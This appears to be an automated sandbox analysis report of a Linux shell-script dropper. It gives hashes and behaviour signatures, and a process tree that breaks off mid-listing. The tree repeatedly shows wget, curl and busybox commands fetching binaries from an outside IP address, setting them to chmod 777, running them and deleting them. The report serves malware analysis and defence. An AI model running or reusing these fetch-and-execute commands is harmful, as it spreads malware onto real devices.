Analysis
-
max time kernel
41s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/11/2024, 02:58
Static task
static1
Behavioral task
behavioral1
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
-
Size
10KB
-
MD5
48124ab0f7a89c1c97280cd1d95e50fc
-
SHA1
ff70079ce44da76abf68922c5f8361cd17d819a7
-
SHA256
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01
-
SHA512
5c4601fa8d6ced3bd753fdd73d4e4c272b96a0ee270f6b73aa0e9a24165e2be53a312c8e33de6e0817f5b1ef30ed39cd5382f14f10e2481c5049be72e593ed77
-
SSDEEP
96:u1/LCQIMnbDE0EIP464TrE0YgsvFMnbDE0yc0CgsdIP1t864TrE0pO3LCREo:u1/fI5IP464TrE0YWmPs64TrE0so
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1646 chmod 1542 chmod 1608 chmod 1620 chmod 1676 chmod 1560 chmod 1578 chmod 1602 chmod 1614 chmod 1670 chmod 1632 chmod 1688 chmod 1530 chmod 1554 chmod 1572 chmod 1584 chmod 1590 chmod 1536 chmod 1652 chmod 1524 chmod 1626 chmod 1664 chmod 1682 chmod 1548 chmod 1566 chmod 1596 chmod 1640 chmod 1658 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh 1525 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh /tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI 1531 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI /tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT 1537 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT /tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb 1543 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb /tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H 1549 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H /tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN 1555 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN /tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL 1561 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL /tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A 1567 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A /tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL 1573 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL /tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF 1579 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF /tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 1585 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 /tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ 1591 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ /tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc 1597 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc /tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 1603 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 /tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL 1609 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL /tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H 1615 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H /tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN 1621 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN /tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL 1627 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL /tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A 1633 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A /tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 1641 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 /tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF 1647 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF /tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 1653 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 /tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ 1659 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ /tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc 1665 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc /tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI 1671 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI /tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh 1677 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh /tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb 1683 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb /tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT 1689 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H curl File opened for modification /tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN curl File opened for modification /tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 curl File opened for modification /tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL curl File opened for modification /tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc curl File opened for modification /tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9 curl File opened for modification /tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh curl File opened for modification /tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT curl File opened for modification /tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT curl File opened for modification /tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc curl File opened for modification /tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI curl File opened for modification /tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb curl File opened for modification /tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL curl File opened for modification /tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI curl File opened for modification /tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H curl File opened for modification /tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 curl File opened for modification /tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb curl File opened for modification /tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN curl File opened for modification /tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL curl File opened for modification /tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ curl File opened for modification /tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh curl File opened for modification /tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A curl File opened for modification /tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF curl File opened for modification /tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL curl File opened for modification /tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A curl File opened for modification /tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF curl File opened for modification /tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6 curl File opened for modification /tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ curl
Processes
-
/tmp/c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh/tmp/c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh1⤵PID:1516
-
/bin/rm/bin/rm bins.sh2⤵PID:1517
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:1518
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:1523
-
-
/bin/chmodchmod 777 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh./AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Executes dropped EXE
PID:1525
-
-
/bin/rmrm AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:1526
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:1527
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:1529
-
-
/bin/chmodchmod 777 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI./b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Executes dropped EXE
PID:1531
-
-
/bin/rmrm b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:1532
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:1533
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:1535
-
-
/bin/chmodchmod 777 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT./7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Executes dropped EXE
PID:1537
-
-
/bin/rmrm 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:1538
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:1539
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:1541
-
-
/bin/chmodchmod 777 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb./wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Executes dropped EXE
PID:1543
-
-
/bin/rmrm wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:1544
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:1545
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:1547
-
-
/bin/chmodchmod 777 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H./gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Executes dropped EXE
PID:1549
-
-
/bin/rmrm gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:1550
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:1551
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:1553
-
-
/bin/chmodchmod 777 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN./ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Executes dropped EXE
PID:1555
-
-
/bin/rmrm ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:1556
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:1557
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:1559
-
-
/bin/chmodchmod 777 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL./cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Executes dropped EXE
PID:1561
-
-
/bin/rmrm cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:1562
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:1563
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Writes file to tmp directory
PID:1564
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:1565
-
-
/bin/chmodchmod 777 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A./CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Executes dropped EXE
PID:1567
-
-
/bin/rmrm CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:1568
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:1569
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:1571
-
-
/bin/chmodchmod 777 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL./5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Executes dropped EXE
PID:1573
-
-
/bin/rmrm 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:1574
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:1575
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:1577
-
-
/bin/chmodchmod 777 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF./OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Executes dropped EXE
PID:1579
-
-
/bin/rmrm OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:1580
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:1581
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:1583
-
-
/bin/chmodchmod 777 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6./6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Executes dropped EXE
PID:1585
-
-
/bin/rmrm 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:1586
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:1587
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:1589
-
-
/bin/chmodchmod 777 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ./iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/rmrm iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:1592
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:1593
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:1595
-
-
/bin/chmodchmod 777 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc./jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Executes dropped EXE
PID:1597
-
-
/bin/rmrm jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:1598
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:1599
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:1601
-
-
/bin/chmodchmod 777 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9./U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:1604
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:1605
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:1607
-
-
/bin/chmodchmod 777 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL./5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm 5thDvcXIcHsWMQqRAJu1qgA8IO34riauPL2⤵PID:1610
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:1613
-
-
/bin/chmodchmod 777 gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H./gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm gkuj0NhdixSKPSAi8PAES1ObSmy0Gn0y9H2⤵PID:1616
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:1619
-
-
/bin/chmodchmod 777 ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN./ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm ZJQ3dmbdoD3iaNDlsPekQiFBuBvckUsPXN2⤵PID:1622
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:1623
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:1625
-
-
/bin/chmodchmod 777 cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL./cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm cRKQUeKUH0p7lOS9p2ancJImFvN0G4bxFL2⤵PID:1628
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:1631
-
-
/bin/chmodchmod 777 CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A./CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵
- Executes dropped EXE
PID:1633
-
-
/bin/rmrm CehTRBVY9F4B1N8UOMOPjJDs4tTMvcAE9A2⤵PID:1634
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:1635
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:1639
-
-
/bin/chmodchmod 777 U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r9./U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm U53T6vKu8teIH15f72SKMmSjhZ0D0Fd6r92⤵PID:1642
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:1645
-
-
/bin/chmodchmod 777 OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF./OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:1648
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:1649
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:1651
-
-
/bin/chmodchmod 777 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6./6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:1654
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Writes file to tmp directory
PID:1656
-
-
